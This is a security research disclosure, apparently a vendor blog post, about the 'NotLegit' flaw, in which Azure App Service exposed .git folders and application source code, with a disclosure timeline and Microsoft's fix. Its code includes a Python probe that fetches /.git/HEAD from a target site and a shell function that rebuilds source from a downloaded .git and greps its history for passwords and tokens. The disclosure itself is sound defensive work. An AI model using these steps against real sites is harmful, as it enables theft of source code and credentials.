The Wiz Research Team detected an insecure default behavior in Azure App Service that exposed the source code of customer applications written in PHP, Python, Ruby, or Node that were deployed using “Local Git”. The vulnerability, which we dubbed “NotLegit”, has existed since September 2017 and has probably been exploited in the wild.
Wiz reported this security flaw to Microsoft on October 7th, 2021, and it has since been mitigated. A small group of customers is still potentially exposed and should take action to protect their applications, as detailed in several email alerts Microsoft issued between December 7th and 15th, 2021.
The Azure App Service (also known as Azure Web Apps) is a cloud computing-based platform for hosting websites and web applications. The service is easy to use, and therefore very popular: first, you select the supported programming language and operating system. Then, you deploy your application source code or artifacts on an Azure-managed server using FTP, SSH, or by pulling the source code from a Git service (such as GitHub or a private Git repository). After deployment, the application is accessible to anyone on the internet under its *.azurewebsites.net domain.
Azure supports multiple methods to deploy source code and artifacts to the Azure App service, one of which is using “Local Git”. With “Local Git”, you initiate a local Git repository within the Azure App Service container that enables you to push your code straight to the server.
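As a rough sketch of that flow (the app and resource-group names below are placeholders, it requires an Azure subscription, and exact output may vary by CLI version), a Local Git deployment looks something like:

```shell
# Enable Local Git deployment for an existing web app (names are hypothetical)
az webapp deployment source config-local-git \
    --name my-app --resource-group my-rg

# Add the returned SCM endpoint as a Git remote and push the code straight to it
git remote add azure https://<deployment-user>@my-app.scm.azurewebsites.net/my-app.git
git push azure master
```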
As a best practice, when you deploy Git repositories to web servers and storage buckets, it is important to ensure that the .git folder is not uploaded as well. Why? Because the .git folder contains the full source code history, developers' emails, and other sensitive data. However, when the “Local Git” deployment method was used to deploy to the Azure App Service, the Git repository was created within the publicly accessible directory (/home/site/wwwroot) that anyone could access. Microsoft was aware of this quirk. To protect your files, Microsoft added a “web.config” file to the .git folder within the public directory to restrict public access. However, only Microsoft's IIS web server handles “web.config” files. If you use C# or ASP.NET, the application is deployed with IIS, and this mitigation works fine.
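For reference, a deny-all web.config of the kind Microsoft placed in the .git folder might look roughly like this. This is a sketch using standard IIS URL Authorization syntax, not Microsoft's actual file:

```xml
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.webServer>
    <security>
      <authorization>
        <!-- Deny every user access to this directory and its contents -->
        <add accessType="Deny" users="*" />
      </authorization>
    </security>
  </system.webServer>
</configuration>
```

A rule like this is only enforced by IIS; other web servers simply treat web.config as an ordinary static file.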
But what happens when you use PHP, Ruby, Python, or Node? These runtimes are served by different web servers (such as Apache and Nginx) that do not handle “web.config” files, leaving them untouched by the mitigation and therefore completely vulnerable. Basically, all a malicious actor had to do was fetch the “/.git” directory from the target application and retrieve its source code.
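To illustrate how little effort this takes, here is a minimal exposure check: fetch /.git/HEAD and see whether the response looks like a real Git HEAD file. The function names and target URL are illustrative, not part of any actual tooling:

```python
# Hypothetical probe for an exposed .git folder on a web app.
from urllib.request import Request, urlopen
from urllib.error import HTTPError, URLError

def looks_like_git_head(body: bytes) -> bool:
    """A real .git/HEAD is either a symbolic ref or a bare 40-char commit hash."""
    body = body.strip()
    return body.startswith(b"ref: refs/") or (
        len(body) == 40 and all(c in b"0123456789abcdef" for c in body)
    )

def git_folder_exposed(base_url: str, timeout: float = 5.0) -> bool:
    """Return True if <base_url>/.git/HEAD is publicly readable and plausible."""
    req = Request(base_url.rstrip("/") + "/.git/HEAD",
                  headers={"User-Agent": "git-exposure-check"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return looks_like_git_head(resp.read(256))
    except (HTTPError, URLError, OSError):
        return False
```

A vulnerable app would answer a request like `git_folder_exposed("https://victim-app.azurewebsites.net")` (a placeholder domain) with a line such as `ref: refs/heads/master`; from there, the rest of the .git object store can be fetched the same way.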
Fun fact: Microsoft’s web.config file had a typo (the configuration tag wasn’t closed properly) that made the file unparseable by IIS. Luckily, the error raised by the typo ended up blocking access to the entire directory... so you could say that "web.config" served its purpose after all 😊
Later on, Microsoft discovered that users who used other Git deployment methods could also be exposed: if a file was created or modified in the Azure App Service container (using FTP, Web Deploy, or SSH) before any Git deployment, the service enters an “inplace deployment” state. This state forces every subsequent Git deployment to be initiated within the publicly accessible directory. For more details, refer to Deploying inplace and without repository.
All PHP, Node, Ruby, and Python applications that were deployed using "Local Git” on a clean default application in Azure App Service since September 2017
All PHP, Node, Ruby, and Python applications that were deployed in Azure App Service from September 2017 onward using any Git source, after a file was created or modified in the application container
The only applications that were not impacted by this security flaw are IIS-based applications.
Between December 7th and 15th, 2021, Microsoft emailed notifications to all impacted users, tailored to each customer's configuration.
An exposed .git folder is a common security mistake that users make without even realizing it. Malicious actors continuously scan the internet for exposed Git folders from which they can collect secrets and intellectual property. Besides the possibility that the source code contains secrets like passwords and access tokens, leaked source code is often used for further, more sophisticated attacks: gathering intel on the R&D division, learning the internal infrastructure, and finding software vulnerabilities. Finding vulnerabilities in software is much easier when the source code is available.
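Once an exposed .git directory has been mirrored locally, ordinary Git commands recover everything in it. A minimal sketch (the function name and the ./loot path are hypothetical):

```shell
# Recover source code and secrets from a downloaded copy of a .git directory.
recover_source() {
  cd "$1" || return 1
  git checkout -- .                         # rebuild the full working tree
  git log --format='%an <%ae> %s'           # list commit authors, emails, messages
  git grep -iE 'password|secret|token' $(git rev-list --all) || true  # hunt history
}
# Example: recover_source ./loot
```

Note that `git grep` over `git rev-list --all` searches every historical revision, so a secret that was "removed" in a later commit is still recoverable.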
Accidentally exposing the Git folder through user error is a security issue that can impact even large organizations; both the United Nations and a number of Indian government sites have been exposed this way in the past, for example. What stands out with NotLegit is that here cloud users did nothing wrong. They did not mistakenly expose their Git folder; the Azure service did. Because the security issue was in an Azure service, cloud users were exposed at scale, without their knowledge and without any control over it.
To assess the chance of exposure with the issue we found, we deployed a vulnerable Azure App Service application, linked it to an unused domain, and waited patiently to see if anyone tried to reach the .git files. Within 4 days of deploying, we were not surprised to see multiple requests for the .git folder from unknown actors.
As this exploitation method is extremely easy, well known, and actively exploited in the wild, we encourage all affected users to review their application’s source code and evaluate the potential risk:
Users who deployed code via FTP, Web Deploy, or Bash/SSH, resulting in files being created in the web app before any Git deployment
Users who enabled LocalGit on the web app
Users who subsequently used a Git clone/push sequence to publish updates
After we disclosed the NotLegit vulnerability, Microsoft recognized the severity of the issue and took the necessary steps to investigate and mitigate it. MSRC and the Azure App Service team conducted a deep investigation, found the root cause, applied a fix that covers most affected customers, and emailed notifications to warn all customers who remain exposed and require user action (hopefully already taken following the customer notification on December 7th).
Microsoft also granted Wiz a $7,500 bounty for this finding, which we plan to donate.
September 12, 2021 – Wiz Research Team first noticed the insecure behavior.
October 7, 2021 – Issue reported to Microsoft.
October 8, 2021 – Report received by Microsoft.
October 14, 2021 – Microsoft asked for a conference call to discuss and triage the issue.
October 19, 2021 – Conference call with MSRC and the Azure App Services team.
October 22, 2021 - Report acknowledged and Wiz was awarded a $7,500 bounty.
November 17, 2021 - The fix for PHP applications was deployed.
December 07, 2021 - Microsoft started notifying vulnerable customers via email.
Keeping up with every cloud service in depth is hard. So far in 2021, Azure alone has announced 402 new products and features, let alone what has been announced by AWS and Google Cloud. All told, it is nearly impossible for the average user to keep up. Wiz's research team, a group of cybersecurity veterans who have been in this space for over 10 years, works around the clock to identify potential security issues in CSP services and help our customers identify and address them. Sometimes, we find vulnerabilities in the platform itself. In 2021 alone, we have helped AWS, Azure, and Google Cloud fix 14 security vulnerabilities across multiple services.
If you have any questions about our research, please reach out to email@example.com
Special thanks to Sebastian Cornejo (@CuriositySec) who helped us gather azurewebsites.net subdomains for this research.